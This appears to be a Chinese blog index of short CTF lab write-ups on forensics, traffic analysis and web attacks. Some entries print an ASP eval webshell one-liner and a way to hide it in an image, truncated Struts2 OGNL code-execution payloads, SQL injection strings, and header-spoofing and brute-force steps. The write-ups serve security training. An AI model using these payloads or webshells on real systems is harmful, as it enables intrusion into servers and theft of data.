- 博客(100)
- 收藏
- 关注
原创 CTF-网络数据分析溯源(端口扫描的IP地址)
根据题意进入环境,下载文件,用wireshark打开过滤命令进行过滤端口,连接最频繁的就是ip,验证ip得到key
2019-08-25 12:24:01
1569
原创 CTF-网络数据分析溯源(发送邮件的IP地址)
根据题意进入环境,下载文件,用wireshark打开使用过滤语句,过滤smtp包里含有admin@qq.com的信息验证ip得到key
2019-08-25 12:22:54
2029
原创 CTF-网络数据分析溯源(查找下载文件的内容)
根据题意进入环境,下载文件,用wireshark打开这一题一开始的思路是通过bindwalk进行分离(题目提示说是下载了zip),但是分离出来之后文件有些损坏只能从其他地方下手通过使用wireshark导出文件的方式来进行分析导出http流量导出后会发现有个key.zip下有张图片,将前六个值提交,get到flag...
2019-08-25 12:21:34
1688
原创 CTF-电子数据取证-日志分析(第2题)
根据题意进入环境,下载文件,用记事本打开,搜索password13/Sep/2018:16:37:54 +0800验证得到key
2019-08-25 12:19:34
3260
1
原创 CTF-WebShell文件上传分析溯源(第1题)
根据题意进入环境,进入后台登录,弱口令 admin/admin 进入后台在添加文章出发现可以上传一句话木马图片生成一句话木马图片准备三个文件1.jpg和1.php和1.bat其中1.php的内容为<%eval request (“cmd”)%>其中1.bat的内容为copy 1.jpg /b + 1.asp /a asp.jpg 存为1.bat文件点击1.bat文件,生...
2019-08-24 20:40:39
914
原创 CTF-IP地址伪造(第2题)
根据题意进入环境,根据提示“只有台湾地区的ip才能登录。“和测试账号猜测test账号。burp suite进行登录抓包进行弱密码爆破,构造X-Forwarded-For:140.113.215.224 (ip地址是台湾的即可)。点击GO发送,得到网页反馈信息,伪造地区IP地址成功,获得key。...
2019-08-24 20:35:56
2669
原创 CTF-IP地址伪造(第1题)
根据题意进入环境,根据提示,弱口令和系统设置只允许在服务器上登录。用burp suite抓包,构造X-Forwarded-For:127.0.0.1,进入爆破,登录成功,获得key
2019-08-24 20:34:53
2863
原创 CTF-投票系统程序设计缺陷分析
根据题意进入环境,提示“请争取窗口“ggg”票数夺取第一名”,burp suite抓包,发送到intruder,构造X-Forwarded-For:172.16. §0§.§1§,构造payloads type从1到255 step为1,开始跑,刷新页面,当ggg第一名时即可获得key...
2019-08-24 20:34:06
847
原创 CTF-来源页伪造
根据题意referer的意思简言之,HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器我是从哪个页面链接过来的,服务器籍此可以获得一些信息用于处理。进入环境,提示“禁止浏览!当前页面只允许从google.com访问。”根据解题方向构造referer=google.com,burp suite抓包提交即可拿到key...
2019-08-24 10:55:37
2192
原创 CTF-某防火墙默认口令
根据题意进入环境,发现登录界面,根据解题方向,参考https://blog.51cto.com/yuntaoliu/536451系统默认的用户管理员用户为useradmin,密码为venus.user。用户可以使用这个账号用于配置系统管理员。登录成功获得key...
2019-08-24 10:54:18
511
原创 CTF-Tomcat后台弱口令漏洞利用
根据题意进入环境,随便点击靶机链接,跳出一个登录界面,因为题目提示网站后台账号密码存在弱口令,用burpsuite爆破得到账号密码为:admin/123456登录进去过后,发现有一个上传界面,根据解题方向上传一个war木马即可:war木马的制作过程:jsp木马源码<%if(“023”.equals(request.getParameter(“pwd”))){java.io...
2019-08-24 10:49:37
2330
原创 CTF-日常密码泄露分析溯源
根据题意进入环境,用御剑扫描出后台登录网页http://219.153.49.228:42886/admin/index.php利用社工信息猜测用户名密码,Burp suite 抓包进入爆破,intruder模式下的Cluster bomb爆破构造用户名和密码start进行爆破后,找长度不一样的数据,发现账号密码分别为“xiaojun”“xiaohong0214”,查看报文,获...
2019-08-24 10:47:42
631
原创 CTF-登录密码重置漏洞分析溯源
根据题意进入环境,进入密码重置页面,填写信息根据页面说明里的18868345809已注册,获取短信验证码,然后修改手机号为17101304128,拿到key
2019-08-24 10:46:11
1077
原创 CTF-网络数据分析溯源(DNS服务器地址)
根据题意进入环境,下载文件,用wireshark加载wireshark筛选udp.port==53或者DNS使用率最高的就是DNS服务器地址验证ip获得key
2019-08-24 10:45:08
2340
原创 CTF-网络数据分析溯源(发布文章的IP地址)
根据题意进入环境,下载文件,用wireshark加载根据两个条件发布一篇文章到www.xwast.org上提高文章采用的协议是post检索http.host==“www.xwast.org” && http.request.method == POST即可找到ip得到IP:172.16.129.49在靶场进行验证,获得key...
2019-08-22 09:09:21
871
原创 CTF-Linux硬盘文件分析取证(MySQL连接密码)
根据题意进入环境,下载文件,用AccessData FTK Imager挂载依次打开/root/.ash_history文件,打开.ash.history文件,发现修改密码的操作记录验证密码后获得key...
2019-08-22 09:08:10
802
原创 CTF-Apache Struts2远程代码执行漏洞(S2-032)复现
根据题意漏洞原理:当启用动态方法调用时,可以传递可用于在服务器端执行任意代码的恶意表达式任意命令执行Exp:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setChara...
2019-08-22 09:07:02
899
原创 CTF-Apache Struts2远程代码执行漏洞(S2-037)复现
根据题意漏洞概述:Apache Struts 2是世界上最流行的Java Web服务器框架之一。Apache Struts2在使用REST插件的情况下,攻击者使用REST调用恶意表达式可以远程执行代码。该漏洞编号为CVE-2016-4438,目前命名为S2-037。,黑客可以利用漏洞直接执行任意代码,绕过文件限制,上传文件,执行远程命令,控制服务器,直接盗取用户的所有资料,该漏洞广泛影响所有s...
2019-08-22 09:06:09
1664
原创 CTF-Windows硬盘文件分析取证(访问的网站地址)
根据题意进入环境,下载文件,用AccessData FTK Imager挂载依次打开([root]>Documents and Settings>lihua>Local Settings>History>History.IE5>MSHist012018110120181102>index.dat,index.dat是一个由Internet Explo...
2019-08-22 09:05:01
1380
原创 CTF-Windows硬盘文件分析取证(登陆用户的用户名)
根据题意进入环境,下载文件,用AccessData FTK Imager挂载在liuhua用户 找到cookies目录打开lihua@laifudao,就发现用户名momo123了,验证后得到key
2019-08-22 09:03:47
2194
1
原创 CTF-CMS系统漏洞分析溯源(第3题)
根据题意想利用漏洞,我们需要先注册一个用户,在注册信息中想方设法插入我们的一句话木马。点“用户注册”来注册一个用户,“用户名”、“登录密码”、“邮件地址”等都可以随便填写,但“密码问题”需要特别注意,要填写“+撺数畲整煺焕敞蹉V=-|悄”,也就是<% execute request(“a”)%>a经过Unicode转码后的代码。进入环境,再注册页面提交问吧数据库的默认地址是问...
2019-08-22 09:02:06
1105
原创 CTF-安卓手机文件分析取证(陌陌发送的视频)
根据题意进入环境,下载文件,根据提示,找到图片文件名依次进入mnt-shell-emulated-0-immomo-users-661453150-video-8,发现目标验证文件名得到key
2019-08-22 09:00:38
374
原创 CTF-安卓手机文件分析取证(微信发送的语音)
根据题意进入环境,下载文件,根据提示,找到图片文件名依次进入mnt-shell-emulated-0-Tencent-MicroMsg- aa657dcfe58fdb0e1e97415bfaccbeed- voice2-1a-e5,发现目标验证文件名得到key...
2019-08-22 08:59:40
720
原创 CTF-安卓手机文件分析取证(微信保存的图片)
根据题意进入环境,下载文件,根据提示,找到图片文件名依次进入mnt-shell-emulated-0-Tencent-MicroMsg-WeiXin,发现目标验证文件名得到key
2019-08-22 08:58:48
587
原创 CTF-安卓手机文件分析取证(陌陌发送的图片)
根据题意进入环境,下载文件,根据提示,找到图片文件名依次进入mnt-shell-emulated-0-immomo-users-661453150-large,发现目标验证文件名得到key
2019-08-22 08:57:49
558
原创 CTF-安卓手机文件分析取证(陌陌发送的语音)
根据题意进入环境,下载文件犯罪嫌疑人肯定是一个用户id,所以需要找到users文件依次进入mnt-shell-emulated-0-immomo-users-661453150-audio2-6发现目标验证用户名得到key...
2019-08-21 09:35:45
334
原创 CTF-IIS写权限漏洞分析溯源
根据题意原因:来源于服务器配置不当造成,利用IIS PUT Scaner扫描有漏洞的iis,此漏洞主要是因为服务器开启了webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。用burp抓包修改写入,修改GET为OPTIONS发现Allow部分有PUT和MOVE然后利用PUT写入一句话木马到一个文件里面更改或增加以下PUT ...
2019-08-21 09:33:47
733
原创 CTF-SQL过滤字符后手工注入漏洞测试(第1题)
根据题意SQL注入原理:SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。进入环境,加’ 和 -1 1+0页面发生变化,返回页面不存在,或者显错,存在注入点进一步发现,空格和‘=’也被过滤掉了所以‘=’可以用Like 替...
2019-08-21 09:32:22
1033
原创 CTF-SQL手工注入漏洞测试(Sql Server数据库)
根据题意SQL注入原理:SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。进入环境,在停机维护发现注入点页面提交:http://mozhe.cn/new_list.php?id=2 order by N分析解说:通过SQ...
2019-08-21 09:28:49
446
原创 CTF-BeesCMS系统漏洞分析溯源
根据题意漏洞原因:因为BeesCMS后台登陆页面存在sql注入,可以被用来写入一句话木马或者查看管理员密码进入环境,通过御剑工具扫描网站目录,发现/admin/login.php首先在用户名 中 输入 ‘ 出现了报错, 确认后台登陆页面的user 有存在sql注入。然后输入 ‘ or 1=1 # 就返回了正常的登陆失败的页面。sql 回显可以看出有五个字段 所以尝试 ‘ unio...
2019-08-21 09:15:17
4770
1
原创 CTF-HTTP头注入漏洞测试(X-Forwarded-for)
根据题意X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。进入环境,打开跳转页打开Burp Suite ,抓包,右键发送给repeater,填入X-Forwarded-For,首先判断是否可注入。order by 判断表数量,从1开始依次试试,最后发现是4union select 1,2...
2019-08-21 09:13:51
2342
原创 CTF-Apache Struts2远程代码执行漏洞(S2-015)复现
根据题意针对 Action 名称进行默认字符限制 [a-z][A-Z][0-9][.-_!/] 漏洞产生于配置了 Action 通配符 *,并将其作为动态值时,解析时会将其内容执行 OGNL 表达式,例如:/{1}.jsp上述配置能让我们访问 name.action 时使用 name.jsp来渲染页面,但是在提取 name 并解析时,对其执行了 OGNL 表达式解析,所以导致命令执行。在实践...
2019-08-21 09:11:27
840
原创 CTF-Apache Struts2远程代码执行漏洞(S2-007)复现
根据题意形成原因:当配置了验证规则,类型转换出错时,进行了错误的字符串拼接,进而造成了OGNL语句的执行。进入环境,查看源码,限制了三个输入框的的值只能为text,而且长度在540以上,然后在登录界面用户名和邮箱值随意,age部分改为我们的payload’ + (#_memberAccess[“allowStaticMethodAccess”]=true,#foo=new java...
2019-08-21 09:10:37
480
原创 CTF-Apache Struts2远程代码执行漏洞(S2-001)复现
根据题意Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。S2-001原理:该漏洞其实是因为用户提交表单数据并且验证失败时,后端会将用...
2019-08-21 09:09:32
813
原创 CTF-安卓手机文件分析取证(微信发送的视频)
根据题意进入环境,下载文件,依次进入tencent-microMsg-用户id-video验证文件名5HB5-D358-E2S5得到key
2019-08-21 09:06:42
330
原创 CTF-Linux硬盘文件分析取证(MySQL操作记录)
靶场地址:https://www.mozhe.cn/bug/detail/RStjSCtaYjRoQm9Ccm5Zb1d3K1V3Zz09bW96aGUmozhe根据题意进入环境,下载文件,用AccessData FTK Imager打开镜像,定位到/root/.mysql_history输入语句获得key...
2019-08-21 09:03:31
681
原创 CTF-远程电子数据取证-服务器分析(第5题)
靶场地址:https://www.mozhe.cn/bug/detail/a0xMcXN4NXIwOXBPSHJDc21jY0YrZz09bW96aGUmozhe根据题意远程桌面连接,登录,直接搜key。。。
2019-08-21 09:02:40
415
原创 CTF-PHP本地包含漏洞代码溯源
靶场地址:https://www.mozhe.cn/bug/detail/VU5RN1VkWG1KNFlUVFVFQkJqZlBuUT09bW96aGUmozhe根据题意进入页面,查看源码,根据提示输入地址,找到key
2019-08-21 09:02:24
360
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人